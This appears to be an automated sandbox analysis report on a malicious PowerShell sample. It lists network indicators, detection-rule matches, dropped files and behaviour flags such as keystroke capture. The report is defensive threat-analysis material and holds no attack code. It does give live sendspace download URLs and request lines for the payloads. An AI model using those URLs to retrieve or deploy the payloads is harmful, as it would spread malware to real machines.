Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 69.31.136.17 69.31.136.17
Source: Joe Sandbox View IP Address: 104.21.28.80 104.21.28.80
Source: Joe Sandbox View IP Address: 69.31.136.57 69.31.136.57
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/12acii HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n1.sendspace.comConnection: Keep-AliveCookie: SID=3n1k50ohec2v6n8nvd1o04nn84
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /pro/dl/12acii HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n1.sendspace.comConnection: Keep-AliveCookie: SID=3n1k50ohec2v6n8nvd1o04nn84
Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs03n4.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs13n1.sendspace.com
Source: OfficeScrSanBroker.exe.9.dr String found in binary or memory: http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER
Source: jucheck.exe.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: jucheck.exe.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: jucheck.exe.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: jucheck.exe.9.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jucheck.exe.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: jucheck.exe.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: jucheck.exe.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: jucheck.exe.9.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jucheck.exe.9.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: jucheck.exe.9.dr String found in binary or memory: http://es5.github.io/#x15.4.4.21
Source: powershell.exe, 00000002.00000002.2504527085.000002505A59A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs03n4.sendspace.com
Source: jucheck.exe.9.dr String found in binary or memory: http://java.sun.com
Source: jucheck.exe.9.dr String found in binary or memory: http://java.sun.comnot
Source: wab.exe, 00000009.00000002.2799289733.0000000022290000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: jucheck.exe.9.dr String found in binary or memory: http://ocsp.digicert.com0
Source: jucheck.exe.9.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: jucheck.exe.9.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: jucheck.exe.9.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.Service
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjects
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfR
Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jucheck.exe.9.dr String found in binary or memory: http://stackoverflow.com/a/1465386/4224163
Source: jucheck.exe.9.dr String found in binary or memory: http://stackoverflow.com/a/15123777)
Source: jucheck.exe.9.dr String found in binary or memory: http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
Source: jucheck.exe.9.dr String found in binary or memory: http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUser
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/DisableUserResponse
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUser
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/EnableUserResponse
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfig
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/GetConfigResponse
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettings
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/ReadSettingsResponse
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettings
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse
Source: officeappguardwin32.exe.9.dr String found in binary or memory: http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: jucheck.exe.9.dr String found in binary or memory: http://www.computerhope.com/forum/index.php?topic=76293.0
Source: jucheck.exe.9.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
Source: jucheck.exe.9.dr String found in binary or memory: http://www.tutorialspoint.com/javascript/array_map.htm
Source: powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: jucheck.exe.9.dr String found in binary or memory: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspaX
Source: powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com
Source: powershell.exe, 00000002.00000002.2504527085.0000025058C3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A582000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n1.sendspace.com/
Source: wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n1.sendspace.com/=6
Source: wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n1.sendspace.com/Z6:
Source: wab.exe, 00000009.00000003.2365648701.00000000069CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2365503757.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: notification_click_helper.exe.9.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: notification_click_helper.exe.9.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: powershell.exe, 00000002.00000002.2504527085.0000025059A59000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: jucheck.exe.9.dr String found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
Source: jucheck.exe.9.dr String found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
Source: jucheck.exe.9.dr String found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
Source: powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2504527085.000002505A55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/J
Source: wab.exe, 00000009.00000003.2365648701.00000000069CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pr
Source: wab.exe, 00000009.00000002.2797826895.0000000021AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/12acii
Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/12aciiBl
Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/12aciiyl
Source: powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/i41a76P
Source: powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/i41a76XRll
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.5:49714 version: TLS 1.2
Installs a raw input device (often for capturing keystrokes)
Source: OfficeScrSanBroker.exe.9.dr Binary or memory string: RegisterRawInputDevices memstr_5464500f-6

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_5572.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6351
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6375
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6351 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6375 Jump to behavior
Creates files inside the system directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F1B8C2 2_2_00007FF848F1B8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F1AB16 2_2_00007FF848F1AB16
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7E928 6_2_04E7E928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7F1F8 6_2_04E7F1F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7E5E0 6_2_04E7E5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07A59398 6_2_07A59398
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
PE file contains executable resources (Code or Archives)
Source: AppVDllSurrogate.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: officeappguardwin32.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate64.exe.9.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OfficeScrSanBroker.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.9.dr Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: AppVLP.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: VC_redist.x64.exe.9.dr Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: UcMapi.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: ai.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: integrator.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.9.dr Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.9.dr Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: upx.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe0.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: SciTE.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.9.dr Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OLicenseHeartbeat.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: grv_icons.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.9.dr Static PE information: Resource name: RT_ICON type: DitPack archive data
Source: javaws.exe.9.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: GoogleCrashHandler.exe.9.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver)
Source: GoogleCrashHandler64.exe.9.dr Static PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
PE file contains strange resources
Source: OcPubMgr.exe.9.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.9.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file overlay found
Source: VSTOInstaller.exe.9.dr Static PE information: Data appended to the last section found
Source: chrome.exe.9.dr Static PE information: Data appended to the last section found
Source: grv_icons.exe.9.dr Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.9.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.9.dr Static PE information: Data appended to the last section found
Source: PerfBoost.exe.9.dr Static PE information: Data appended to the last section found
Source: aimgr.exe0.9.dr Static PE information: Data appended to the last section found
Source: SQLDumper.exe.9.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.9.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.9.dr Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.9.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.9.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.9.dr Static PE information: Data appended to the last section found
Source: armsvc.exe.9.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.9.dr Static PE information: Data appended to the last section found
Source: javaws.exe.9.dr Static PE information: Data appended to the last section found
Source: msoev.exe.9.dr Static PE information: Data appended to the last section found
Source: javaw.exe.9.dr Static PE information: Data appended to the last section found
Source: MsMpEng.exe.9.dr Static PE information: Data appended to the last section found
Source: aimgr.exe.9.dr Static PE information: Data appended to the last section found
Source: java.exe.9.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.9.dr Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.9.dr Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.9.dr Static PE information: Data appended to the last section found
Source: Wordconv.exe.9.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.9.dr Static PE information: Data appended to the last section found
Source: Common.DBConnection.exe.9.dr Static PE information: Data appended to the last section found
Source: SDXHelper.exe.9.dr Static PE information: Data appended to the last section found
Source: upx.exe.9.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler.exe.9.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.9.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.9.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler64.exe.9.dr Static PE information: Data appended to the last section found
Source: AppVLP.exe.9.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.9.dr Static PE information: Data appended to the last section found
Source: dbcicons.exe.9.dr Static PE information: Data appended to the last section found
Yara signature match
Source: amsi32_5572.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: VC_redist.x64.exe.9.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: OfficeScrSanBroker.exe.9.dr Binary string: \Device\Afd\WepollNtCreateFilentdll.dllNtReleaseKeyedEventRtlNtStatusToDosErrorNtDeviceIoControlFileNtWaitForKeyedEventNtCreateKeyedEventwsipcudptcppipe_ != NULLopensource\libzmq\src\channel.cpp%s (%s:%d)
Source: classification engine Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Klavers.Uen Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
